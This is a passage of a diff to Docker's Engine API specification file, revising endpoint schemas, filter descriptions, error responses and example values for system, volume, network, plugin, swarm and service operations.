+            - `until=<string>` Prune images created before this timestamp. The `<timestamp>` can be Unix timestamps, date formatted timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed relative to the daemon machine’s time.
+            - `label` (`label=<key>`, `label=<key>=<value>`, `label!=<key>`, or `label!=<key>=<value>`) Prune images with (or without, in case `label!=...` is used) the specified labels.
           type: "string"
       responses:
         200:
           description: "No error"
           schema:
             type: "object"
+            title: "ImagePruneResponse"
             properties:
               ImagesDeleted:
                 description: "Images that were deleted"
                 type: "array"
                 items:
-                  $ref: "#/definitions/ImageDeleteResponse"
+                  $ref: "#/definitions/ImageDeleteResponseItem"
               SpaceReclaimed:
                 description: "Disk space reclaimed in bytes"
                 type: "integer"
@@ -4900,6 +6840,7 @@ paths:
           description: "An identity token was generated successfully."
           schema:
             type: "object"
+            title: "SystemAuthResponse"
             required: [Status]
             properties:
               Status:
@@ -4937,203 +6878,7 @@ paths:
         200:
           description: "No error"
           schema:
-            type: "object"
-            properties:
-              Architecture:
-                type: "string"
-              Containers:
-                type: "integer"
-              ContainersRunning:
-                type: "integer"
-              ContainersStopped:
-                type: "integer"
-              ContainersPaused:
-                type: "integer"
-              CpuCfsPeriod:
-                type: "boolean"
-              CpuCfsQuota:
-                type: "boolean"
-              Debug:
-                type: "boolean"
-              DiscoveryBackend:
-                type: "string"
-              DockerRootDir:
-                type: "string"
-              Driver:
-                type: "string"
-              DriverStatus:
-                type: "array"
-                items:
-                  type: "array"
-                  items:
-                    type: "string"
-              SystemStatus:
-                type: "array"
-                items:
-                  type: "array"
-                  items:
-                    type: "string"
-              Plugins:
-                type: "object"
-                properties:
-                  Volume:
-                    type: "array"
-                    items:
-                      type: "string"
-                  Network:
-                    type: "array"
-                    items:
-                      type: "string"
-              ExperimentalBuild:
-                type: "boolean"
-              HttpProxy:
-                type: "string"
-              HttpsProxy:
-                type: "string"
-              ID:
-                type: "string"
-              IPv4Forwarding:
-                type: "boolean"
-              Images:
-                type: "integer"
-              IndexServerAddress:
-                type: "string"
-              InitPath:
-                type: "string"
-              InitSha1:
-                type: "string"
-              KernelVersion:
-                type: "string"
-              Labels:
-                type: "array"
-                items:
-                  type: "string"
-              MemTotal:
-                type: "integer"
-              MemoryLimit:
-                type: "boolean"
-              NCPU:
-                type: "integer"
-              NEventsListener:
-                type: "integer"
-              NFd:
-                type: "integer"
-              NGoroutines:
-                type: "integer"
-              Name:
-                type: "string"
-              NoProxy:
-                type: "string"
-              OomKillDisable:
-                type: "boolean"
-              OSType:
-                type: "string"
-              OomScoreAdj:
-                type: "integer"
-              OperatingSystem:
-                type: "string"
-              RegistryConfig:
-                type: "object"
-                properties:
-                  IndexConfigs:
-                    type: "object"
-                    additionalProperties:
-                      type: "object"
-                      properties:
-                        Mirrors:
-                          type: "array"
-                          items:
-                            type: "string"
-                        Name:
-                          type: "string"
-                        Official:
-                          type: "boolean"
-                        Secure:
-                          type: "boolean"
-                  InsecureRegistryCIDRs:
-                    type: "array"
-                    items:
-                      type: "string"
-              SwapLimit:
-                type: "boolean"
-              SystemTime:
-                type: "string"
-              ServerVersion:
-                type: "string"
-          examples:
-            application/json:
-              Architecture: "x86_64"
-              ClusterStore: "etcd://localhost:2379"
-              CgroupDriver: "cgroupfs"
-              Containers: 11
-              ContainersRunning: 7
-              ContainersStopped: 3
-              ContainersPaused: 1
-              CpuCfsPeriod: true
-              CpuCfsQuota: true
-              Debug: false
-              DockerRootDir: "/var/lib/docker"
-              Driver: "btrfs"
-              DriverStatus:
-                -
-                  - ""
-              ExperimentalBuild: false
-              HttpProxy: "http://test:test@localhost:8080"
-              HttpsProxy: "https://test:test@localhost:8080"
-              ID: "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS"
-              IPv4Forwarding: true
-              Images: 16
-              IndexServerAddress: "https://index.docker.io/v1/"
-              InitPath: "/usr/bin/docker"
-              InitSha1: ""
-              KernelMemory: true
-              KernelVersion: "3.12.0-1-amd64"
-              Labels:
-                - "storage=ssd"
-              MemTotal: 2099236864
-              MemoryLimit: true
-              NCPU: 1
-              NEventsListener: 0
-              NFd: 11
-              NGoroutines: 21
-              Name: "prod-server-42"
-              NoProxy: "9.81.1.160"
-              OomKillDisable: true
-              OSType: "linux"
-              OperatingSystem: "Boot2Docker"
-              Plugins:
-                Volume:
-                  - "local"
-                Network:
-                  - "null"
-                  - "host"
-                  - "bridge"
-              RegistryConfig:
-                IndexConfigs:
-                  docker.io:
-                    Name: "docker.io"
-                    Official: true
-                    Secure: true
-                InsecureRegistryCIDRs:
-                  - "127.0.0.0/8"
-              SecurityOptions:
-                - Key: "Name"
-                  Value: "seccomp"
-                - Key: "Profile"
-                  Value: "default"
-                - Key: "Name"
-                  Value: "apparmor"
-                - Key: "Name"
-                  Value: "selinux"
-                - Key: "Name"
-                  Value: "userns"
-              ServerVersion: "1.9.0"
-              SwapLimit: false
-              SystemStatus:
-                -
-                  - "State"
-                  - "Healthy"
-              SystemTime: "2015-03-10T11:11:23.730591467-07:00"
+            $ref: "#/definitions/SystemInfo"
         500:
           description: "Server error"
           schema:
@@ -5144,14 +6889,36 @@ paths:
       summary: "Get version"
       description: "Returns the version of Docker that is running and various information about the system that Docker is running on."
       operationId: "SystemVersion"
-      produces:
-        - "application/json"
+      produces: ["application/json"]
       responses:
         200:
           description: "no error"
           schema:
             type: "object"
+            title: "SystemVersionResponse"
             properties:
+              Platform:
+                type: "object"
+                required: [Name]
+                properties:
+                  Name:
+                    type: "string"
+              Components:
+                type: "array"
+                items:
+                  type: "object"
+                  x-go-name: ComponentVersion
+                  required: [Name, Version]
+                  properties:
+                    Name:
+                      type: "string"
+                    Version:
+                      type: "string"
+                      x-nullable: false
+                    Details:
+                      type: "object"
+                      x-nullable: true
+
               Version:
                 type: "string"
               ApiVersion:
@@ -5174,13 +6941,13 @@ paths:
                 type: "string"
           examples:
             application/json:
-              Version: "1.13.0"
+              Version: "17.04.0"
               Os: "linux"
               KernelVersion: "3.19.0-23-generic"
-              GoVersion: "go1.6.3"
+              GoVersion: "go1.7.5"
               GitCommit: "deadbee"
               Arch: "amd64"
-              ApiVersion: "1.25"
+              ApiVersion: "1.27"
               MinAPIVersion: "1.12"
               BuildTime: "2016-06-14T07:09:13.444803460+00:00"
               Experimental: true
@@ -5194,14 +6961,20 @@ paths:
       summary: "Ping"
       description: "This is a dummy endpoint you can use to test if the server is accessible."
       operationId: "SystemPing"
-      produces:
-        - "text/plain"
+      produces: ["text/plain"]
       responses:
         200:
           description: "no error"
           schema:
             type: "string"
             example: "OK"
+          headers:
+            API-Version:
+              type: "string"
+              description: "Max API Version the server supports"
+            Docker-Experimental:
+              type: "boolean"
+              description: "If the server is running with experimental mode enabled"
         500:
           description: "server error"
           schema:
@@ -5236,7 +7009,7 @@ paths:
           in: "body"
           description: "The container configuration"
           schema:
-            $ref: "#/definitions/Config"
+            $ref: "#/definitions/ContainerConfig"
         - name: "container"
           in: "query"
           description: "The ID or name of the container to commit"
@@ -5275,16 +7048,24 @@ paths:
 
         Various objects within Docker report events when something happens to them.
 
-        Containers report these events: `attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update`
+        Containers report these events: `attach`, `commit`, `copy`, `create`, `destroy`, `detach`, `die`, `exec_create`, `exec_detach`, `exec_start`, `exec_die`, `export`, `health_status`, `kill`, `oom`, `pause`, `rename`, `resize`, `restart`, `start`, `stop`, `top`, `unpause`, and `update`
 
-        Images report these events: `delete, import, load, pull, push, save, tag, untag`
+        Images report these events: `delete`, `import`, `load`, `pull`, `push`, `save`, `tag`, and `untag`
 
-        Volumes report these events: `create, mount, unmount, destroy`
+        Volumes report these events: `create`, `mount`, `unmount`, and `destroy`
 
-        Networks report these events: `create, connect, disconnect, destroy`
+        Networks report these events: `create`, `connect`, `disconnect`, `destroy`, `update`, and `remove`
 
         The Docker daemon reports these events: `reload`
 
+        Services report these events: `create`, `update`, and `remove`
+
+        Nodes report these events: `create`, `update`, and `remove`
+
+        Secrets report these events: `create`, `update`, and `remove`
+
+        Configs report these events: `create`, `update`, and `remove`
+
       operationId: "SystemEvents"
       produces:
         - "application/json"
@@ -5293,6 +7074,7 @@ paths:
           description: "no error"
           schema:
             type: "object"
+            title: "SystemEventsResponse"
             properties:
               Type:
                 description: "The type of object emitting the event"
@@ -5329,6 +7111,10 @@ paths:
                   image: "alpine"
                   name: "my-container"
               time: 1461943101
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
@@ -5347,14 +7133,20 @@ paths:
           description: |
             A JSON encoded value of filters (a `map[string][]string`) to process on the event list. Available filters:
 
+            - `config=<string>` config name or ID
             - `container=<string>` container name or ID
+            - `daemon=<string>` daemon name or ID
             - `event=<string>` event type
             - `image=<string>` image name or ID
             - `label=<string>` image or container label
-            - `type=<string>` object to filter by, one of `container`, `image`, `volume`, `network`, or `daemon`
-            - `volume=<string>` volume name or ID
             - `network=<string>` network name or ID
-            - `daemon=<string>` daemon name or ID
+            - `node=<string>` node ID
+            - `plugin`=<string> plugin name or ID
+            - `scope`=<string> local or swarm
+            - `secret=<string>` secret name or ID
+            - `service=<string>` service name or ID
+            - `type=<string>` object to filter by, one of `container`, `image`, `volume`, `network`, `daemon`, `plugin`, `node`, `service`, `secret` or `config`
+            - `volume=<string>` volume name
           type: "string"
       tags: ["System"]
   /system/df:
@@ -5366,6 +7158,7 @@ paths:
           description: "no error"
           schema:
             type: "object"
+            title: "SystemDataUsageResponse"
             properties:
               LayersSize:
                 type: "integer"
@@ -5434,13 +7227,13 @@ paths:
                 -
                   Name: "my-volume"
                   Driver: "local"
-                  Mountpoint: ""
+                  Mountpoint: "/var/lib/docker/volumes/my-volume/_data"
                   Labels: null
-                  Scope: ""
+                  Scope: "local"
                   Options: null
                   UsageData:
-                    Size: 0
-                    RefCount: 0
+                    Size: 10920104
+                    RefCount: 2
         500:
           description: "server error"
           schema:
@@ -5623,6 +7416,9 @@ paths:
               User:
                 type: "string"
                 description: "The user, and optionally, group to run the exec process inside the container. Format is one of: `user`, `user:group`, `uid`, or `uid:gid`."
+              WorkingDir:
+                type: "string"
+                description: "The working directory for the exec process inside the container."
             example:
               AttachStdin: false
               AttachStdout: true
@@ -5721,7 +7517,12 @@ paths:
           description: "No error"
           schema:
             type: "object"
+            title: "ExecInspectResponse"
             properties:
+              CanRemove:
+                type: "boolean"
+              DetachKeys:
+                type: "string"
               ID:
                 type: "string"
               Running:
@@ -5787,6 +7588,7 @@ paths:
           description: "Summary volume data that matches the query"
           schema:
             type: "object"
+            title: "VolumeListResponse"
             required: [Volumes, Warnings]
             properties:
               Volumes:
@@ -5805,7 +7607,8 @@ paths:
           examples:
             application/json:
               Volumes:
-                - Name: "tardis"
+                - CreatedAt: "2017-07-19T12:00:26Z"
+                  Name: "tardis"
                   Driver: "local"
                   Mountpoint: "/var/lib/docker/volumes/tardis"
                   Labels:
@@ -5828,13 +7631,14 @@ paths:
             JSON encoded value of the filters (a `map[string][]string`) to
             process on the volumes list. Available filters:
 
-            - `name=<volume-name>` Matches all or part of a volume name.
             - `dangling=<boolean>` When set to `true` (or `1`), returns all
                volumes that are not in use by a container. When set to `false`
                (or `0`), only volumes that are in use by one or more
                containers are returned.
-            - `driver=<volume-driver-name>` Matches all or part of a volume
-              driver name.
+            - `driver=<volume-driver-name>` Matches volumes based on their driver.
+            - `label=<key>` or `label=<key>:<value>` Matches volumes based on
+               the presence of a `label` alone or a `label` and a value.
+            - `name=<volume-name>` Matches all or part of a volume name.
           type: "string"
           format: "json"
       tags: ["Volume"]
@@ -5959,12 +7763,14 @@ paths:
             Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
 
             Available filters:
+            - `label` (`label=<key>`, `label=<key>=<value>`, `label!=<key>`, or `label!=<key>=<value>`) Prune volumes with (or without, in case `label!=...` is used) the specified labels.
           type: "string"
       responses:
         200:
           description: "No error"
           schema:
             type: "object"
+            title: "VolumePruneResponse"
             properties:
               VolumesDeleted:
                 description: "Volumes that were deleted"
@@ -5983,6 +7789,11 @@ paths:
   /networks:
     get:
       summary: "List networks"
+      description: |
+        Returns a list of networks. For details on the format, see [the network inspect endpoint](#operation/NetworkInspect).
+
+        Note that it uses a different, smaller representation of a network than inspecting a single network. For example,
+        the list of containers attached to the network is not propagated in API versions 1.28 and up.
       operationId: "NetworkList"
       produces:
         - "application/json"
@@ -6002,17 +7813,13 @@ paths:
                 Driver: "bridge"
                 EnableIPv6: false
                 Internal: false
+                Attachable: false
+                Ingress: false
                 IPAM:
                   Driver: "default"
                   Config:
                     -
                       Subnet: "172.17.0.0/16"
-                Containers:
-                  39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867:
-                    EndpointID: "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda"
-                    MacAddress: "02:42:ac:11:00:02"
-                    IPv4Address: "172.17.0.2/16"
-                    IPv6Address: ""
                 Options:
                   com.docker.network.bridge.default_bridge: "true"
                   com.docker.network.bridge.enable_icc: "true"
@@ -6027,6 +7834,8 @@ paths:
                 Driver: "null"
                 EnableIPv6: false
                 Internal: false
+                Attachable: false
+                Ingress: false
                 IPAM:
                   Driver: "default"
                   Config: []
@@ -6039,6 +7848,8 @@ paths:
                 Driver: "host"
                 EnableIPv6: false
                 Internal: false
+                Attachable: false
+                Ingress: false
                 IPAM:
                   Driver: "default"
                   Config: []
@@ -6058,6 +7869,7 @@ paths:
             - `id=<network-id>` Matches all or part of a network ID.
             - `label=<key>` or `label=<key>=<value>` of a network label.
             - `name=<network-name>` Matches all or part of a network name.
+            - `scope=["swarm"|"global"|"local"]` Filters networks by scope (`swarm`, `global`, or `local`).
             - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks.
           type: "string"
       tags: ["Network"]
@@ -6077,12 +7889,25 @@ paths:
           description: "Network not found"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
           description: "Network ID or name"
           required: true
           type: "string"
+        - name: "verbose"
+          in: "query"
+          description: "Detailed inspect output for troubleshooting"
+          type: "boolean"
+          default: false
+        - name: "scope"
+          in: "query"
+          description: "Filter the network by scope (swarm, global, or local)"
+          type: "string"
       tags: ["Network"]
 
     delete:
@@ -6091,6 +7916,10 @@ paths:
       responses:
         204:
           description: "No error"
+        403:
+          description: "operation not supported for pre-defined networks"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         404:
           description: "no such network"
           schema:
@@ -6120,6 +7949,7 @@ paths:
           description: "No error"
           schema:
             type: "object"
+            title: "NetworkCreateResponse"
             properties:
               Id:
                 description: "The ID of the created network."
@@ -6154,7 +7984,7 @@ paths:
                 description: "The network's name."
                 type: "string"
               CheckDuplicate:
-                description: "Check for networks with duplicate names."
+                description: "Check for networks with duplicate names. Since Network is primarily keyed based on a random ID and not on the name, and network name is strictly a user-friendly alias to the network which is uniquely identified using ID, there is no guaranteed way to check for duplicates. CheckDuplicate is there to provide a best effort checking of any networks which has the same name but it is not guaranteed to catch all name collisions."
                 type: "boolean"
               Driver:
                 description: "Name of the network driver plugin to use."
@@ -6163,6 +7993,12 @@ paths:
               Internal:
                 description: "Restrict external access to the network."
                 type: "boolean"
+              Attachable:
+                description: "Globally scoped network is manually attachable by regular containers from workers in swarm mode."
+                type: "boolean"
+              Ingress:
+                description: "Ingress network is the network which provides the routing-mesh in swarm mode."
+                type: "boolean"
               IPAM:
                 description: "Optional custom IP scheme for the network."
                 $ref: "#/definitions/IPAM"
@@ -6195,6 +8031,8 @@ paths:
                 Options:
                   foo: "bar"
               Internal: true
+              Attachable: false
+              Ingress: false
               Options:
                 com.docker.network.bridge.default_bridge: "true"
                 com.docker.network.bridge.enable_icc: "true"
@@ -6212,7 +8050,7 @@ paths:
       summary: "Connect a container to a network"
       operationId: "NetworkConnect"
       consumes:
-        - "application/octet-stream"
+        - "application/json"
       responses:
         200:
           description: "No error"
@@ -6296,8 +8134,6 @@ paths:
   /networks/prune:
     post:
       summary: "Delete unused networks"
-      consumes:
-        - "application/json"
       produces:
         - "application/json"
       operationId: "NetworkPrune"
@@ -6308,12 +8144,15 @@ paths:
             Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
 
             Available filters:
+            - `until=<timestamp>` Prune networks created before this timestamp. The `<timestamp>` can be Unix timestamps, date formatted timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed relative to the daemon machine’s time.
+            - `label` (`label=<key>`, `label=<key>=<value>`, `label!=<key>`, or `label!=<key>=<value>`) Prune networks with (or without, in case `label!=...` is used) the specified labels.
           type: "string"
       responses:
         200:
           description: "No error"
           schema:
             type: "object"
+            title: "NetworkPruneResponse"
             properties:
               NetworksDeleted:
                 description: "Networks that were deleted"
@@ -6338,50 +8177,19 @@ paths:
             type: "array"
             items:
               $ref: "#/definitions/Plugin"
-            example:
-              - Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078"
-                Name: "tiborvass/sample-volume-plugin"
-                Tag: "latest"
-                Active: true
-                Settings:
-                  Env:
-                    - "DEBUG=0"
-                  Args: null
-                  Devices: null
-                Config:
-                  Description: "A sample volume plugin for Docker"
-                  Documentation: "https://docs.docker.com/engine/extend/plugins/"
-                  Interface:
-                    Types:
-                      - "docker.volumedriver/1.0"
-                    Socket: "plugins.sock"
-                  Entrypoint:
-                    - "/usr/bin/sample-volume-plugin"
-                    - "/data"
-                  WorkDir: ""
-                  User: {}
-                  Network:
-                    Type: ""
-                  Linux:
-                    Capabilities: null
-                    AllowAllDevices: false
-                    Devices: null
-                  Mounts: null
-                  PropagatedMount: "/data"
-                  Env:
-                    - Name: "DEBUG"
-                      Description: "If set, prints debug messages"
-                      Settable: null
-                      Value: "0"
-                  Args:
-                    Name: "args"
-                    Description: "command line arguments"
-                    Settable: null
-                    Value: []
         500:
           description: "Server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          type: "string"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the plugin list. Available filters:
+
+            - `capability=<capability name>`
+            - `enable=<true>|<false>`
       tags: ["Plugin"]
 
   /plugins/privileges:
@@ -6396,6 +8204,7 @@ paths:
             items:
               description: "Describes a permission the user has to accept upon installing the plugin."
               type: "object"
+              title: "PluginPrivilegeItem"
               properties:
                 Name:
                   type: "string"
@@ -6423,7 +8232,7 @@ paths:
           schema:
             $ref: "#/definitions/ErrorResponse"
       parameters:
-        - name: "name"
+        - name: "remote"
           in: "query"
           description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted."
           required: true
@@ -6557,6 +8366,10 @@ paths:
       responses:
         200:
           description: "no error"
+        404:
+          description: "plugin is not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
@@ -6580,6 +8393,10 @@ paths:
       responses:
         200:
           description: "no error"
+        404:
+          description: "plugin is not installed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
@@ -6750,6 +8567,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "filters"
           in: "query"
@@ -6781,6 +8602,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
@@ -6802,6 +8627,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
@@ -6821,6 +8650,10 @@ paths:
       responses:
         200:
           description: "no error"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         404:
           description: "no such node"
           schema:
@@ -6829,6 +8662,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
@@ -6854,49 +8691,19 @@ paths:
         200:
           description: "no error"
           schema:
-            allOf:
-              - $ref: "#/definitions/ClusterInfo"
-              - type: "object"
-                properties:
-                  JoinTokens:
-                    description: "The tokens workers and managers need to join the swarm."
-                    type: "object"
-                    properties:
-                      Worker:
-                        description: "The token workers can use to join the swarm."
-                        type: "string"
-                      Manager:
-                        description: "The token managers can use to join the swarm."
-                        type: "string"
-            example:
-              CreatedAt: "2016-08-15T16:00:20.349727406Z"
-              Spec:
-                Dispatcher:
-                  HeartbeatPeriod: 5000000000
-                Orchestration:
-                  TaskHistoryRetentionLimit: 10
-                CAConfig:
-                  NodeCertExpiry: 7776000000000000
-                Raft:
-                  LogEntriesForSlowFollowers: 500
-                  HeartbeatTick: 1
-                  SnapshotInterval: 10000
-                  ElectionTick: 3
-                TaskDefaults: {}
-                EncryptionConfig:
-                  AutoLockManagers: false
-                Name: "default"
-              JoinTokens:
-                Worker: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a"
-                Manager: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l"
-              ID: "70ilmkj2f6sp2137c753w2nmt"
-              UpdatedAt: "2016-08-15T16:32:09.623207604Z"
-              Version:
-                Index: 51
+            $ref: "#/definitions/Swarm"
+        404:
+          description: "no such swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       tags: ["Swarm"]
   /swarm/init:
     post:
@@ -6916,14 +8723,14 @@ paths:
           description: "bad parameter"
           schema:
             $ref: "#/definitions/ErrorResponse"
-        406:
-          description: "node is already part of a swarm"
-          schema:
-            $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is already part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "body"
           in: "body"
@@ -6937,6 +8744,16 @@ paths:
               AdvertiseAddr:
                 description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible."
                 type: "string"
+              DataPathAddr:
+                description: |
+                  Address or interface to use for data path traffic (format: `<ip|interface>`), for example,  `192.168.1.1`,
+                  or an interface, like `eth0`. If `DataPathAddr` is unspecified, the same address as `AdvertiseAddr`
+                  is used.
+
+                  The `DataPathAddr` specifies the address that global scope network drivers will publish towards other
+                  nodes in order to reach the containers running on this node. Using this parameter it is possible to
+                  separate the container data traffic from the management traffic of the cluster.
+                type: "string"
               ForceNewCluster:
                 description: "Force creation of a new swarm."
                 type: "boolean"
@@ -6985,6 +8802,17 @@ paths:
                 type: "string"
               AdvertiseAddr:
                 description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible."
+                type: "string"
+              DataPathAddr:
+                description: |
+                  Address or interface to use for data path traffic (format: `<ip|interface>`), for example,  `192.168.1.1`,
+                  or an interface, like `eth0`. If `DataPathAddr` is unspecified, the same address as `AdvertiseAddr`
+                  is used.
+
+                  The `DataPathAddr` specifies the address that global scope network drivers will publish towards other
+                  nodes in order to reach the containers running on this node. Using this parameter it is possible to
+                  separate the container data traffic from the management traffic of the cluster.
+
                 type: "string"
               RemoteAddrs:
                 description: "Addresses of manager nodes already participating in the swarm."
@@ -7079,6 +8907,7 @@ paths:
           description: "no error"
           schema:
             type: "object"
+            title: "UnlockKeyResponse"
             properties:
               UnlockKey:
                 description: "The swarm's unlock key."
@@ -7089,6 +8918,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       tags: ["Swarm"]
   /swarm/unlock:
     post:
@@ -7117,6 +8950,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       tags: ["Swarm"]
   /services:
     get:
@@ -7133,6 +8970,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "filters"
           in: "query"
@@ -7141,8 +8982,9 @@ paths:
             A JSON encoded value of the filters (a `map[string][]string`) to process on the services list. Available filters:
 
             - `id=<service id>`
-            - `name=<service name>`
             - `label=<service label>`
+            - `mode=["replicated"|"global"]`
+            - `name=<service name>`
       tags: ["Service"]
   /services/create:
     post:
@@ -7157,6 +8999,7 @@ paths:
           description: "no error"
           schema:
             type: "object"
+            title: "ServiceCreateResponse"
             properties:
               ID:
                 description: "The ID of the created service."
@@ -7167,6 +9010,10 @@ paths:
             example:
               ID: "ak7w3gjqoa3kuz8xcpnyy0pvl"
               Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         403:
           description: "network is not eligible for services"
           schema:
@@ -7180,7 +9027,7 @@ paths:
           schema:
             $ref: "#/definitions/ErrorResponse"
         503:
-          description: "server error or node is not part of a swarm"
+          description: "node is not part of a swarm"
           schema:
             $ref: "#/definitions/ErrorResponse"
       parameters:
@@ -7206,11 +9053,21 @@ paths:
                             DriverConfig: {}
                             Labels:
                               com.example.something: "something-value"
+                      Hosts: ["10.10.10.10 host1", "ABCD:EF01:2345:6789:ABCD:EF01:2345:6789 host2"]
                       User: "33"
                       DNSConfig:
                         Nameservers: ["8.8.8.8"]
                         Search: ["example.org"]
                         Options: ["timeout:3"]
+                      Secrets:
+                        -
+                          File:
+                            Name: "www.example.org.key"
+                            UID: "33"
+                            GID: "33"
+                            Mode: 384
+                          SecretID: "fpjqlhnwb19zds35k8wn80lq9"
+                          SecretName: "example_org_domain_key"
                     LogDriver:
                       Name: "json-file"
                       Options:
@@ -7229,9 +9086,17 @@ paths:
                     Replicated:
                       Replicas: 4
                   UpdateConfig:
-                    Delay: 30000000000
                     Parallelism: 2
+                    Delay: 1000000000
+                    FailureAction: "pause"
+                    Monitor: 15000000000
+                    MaxFailureRatio: 0.15
+                  RollbackConfig:
+                    Parallelism: 1
+                    Delay: 1000000000
                     FailureAction: "pause"
+                    Monitor: 15000000000
+                    MaxFailureRatio: 0.15
                   EndpointSpec:
                     Ports:
                       -
@@ -7262,12 +9127,21 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
           description: "ID or name of service."
           required: true
           type: "string"
+        - name: "insertDefaults"
+          in: "query"
+          description: "Fill empty fields with default values."
+          type: "boolean"
+          default: false
       tags: ["Service"]
     delete:
       summary: "Delete a service"
@@ -7283,6 +9157,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
@@ -7300,7 +9178,11 @@ paths:
         200:
           description: "no error"
           schema:
-            $ref: "#/definitions/ImageDeleteResponse"
+            $ref: "#/definitions/ServiceUpdateResponse"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         404:
           description: "no such service"
           schema:
@@ -7309,6 +9191,10 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
@@ -7341,7 +9227,15 @@ paths:
                     Replicated:
                       Replicas: 1
                   UpdateConfig:
+                    Parallelism: 2
+                    Delay: 1000000000
+                    FailureAction: "pause"
+                    Monitor: 15000000000
+                    MaxFailureRatio: 0.15
+                  RollbackConfig:
                     Parallelism: 1
+                    Delay: 1000000000
+                    FailureAction: "pause"
                     Monitor: 15000000000
                     MaxFailureRatio: 0.15
                   EndpointSpec:
@@ -7359,6 +9253,12 @@ paths:
   parameter indicates where to find registry authorization credentials. The
   valid values are `spec` and `previous-spec`."
           default: "spec"
+        - name: "rollback"
+          in: "query"
+          type: "string"
+          description: "Set to this parameter to `previous` to cause a
+  server-side rollback to the previous service spec. The supplied spec will be
+  ignored in this case."
         - name: "X-Registry-Auth"
           in: "header"
           description: "A base64-encoded auth configuration for pulling from private registries. [See the authentication section for details.](#section/Authentication)"
@@ -7387,25 +9287,29 @@ paths:
           schema:
             type: "string"
         404:
-          description: "no such container"
+          description: "no such service"
           schema:
             $ref: "#/definitions/ErrorResponse"
           examples:
             application/json:
